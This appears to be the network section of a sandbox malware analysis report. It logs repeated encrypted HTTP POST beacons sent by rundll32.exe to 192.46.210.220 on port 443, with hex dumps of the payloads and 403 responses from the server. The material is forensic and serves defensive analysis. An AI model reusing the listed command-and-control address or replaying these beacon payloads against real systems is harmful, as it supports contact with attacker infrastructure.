                                                                                                      2021-10-28 03:08:08 UTC169OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:09 UTC179INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.449930192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:09 UTC174OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:09 UTC174OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:09 UTC179INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.449938192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:12 UTC179OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:12 UTC179OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:13 UTC189INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.449939192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:12 UTC184OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:12 UTC184OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:13 UTC189INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.449946192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:16 UTC189OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:16 UTC189OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:17 UTC199INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.449947192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:16 UTC194OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:16 UTC194OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:17 UTC199INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.449801192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:10 UTC19OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:10 UTC20OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:11 UTC29INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.449954192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:20 UTC199OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:20 UTC199OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:21 UTC209INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:20 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.449955192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:20 UTC204OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:20 UTC204OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:21 UTC209INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.449962192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:24 UTC209OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:24 UTC209OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:24 UTC219INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:24 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.449963192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:24 UTC214OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:24 UTC214OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:25 UTC219INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      44192.168.2.449973192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:28 UTC219OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:28 UTC219OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:28 UTC229INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:28 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      45192.168.2.449975192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:28 UTC224OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:28 UTC224OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:29 UTC229INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      46192.168.2.450001192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:32 UTC229OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
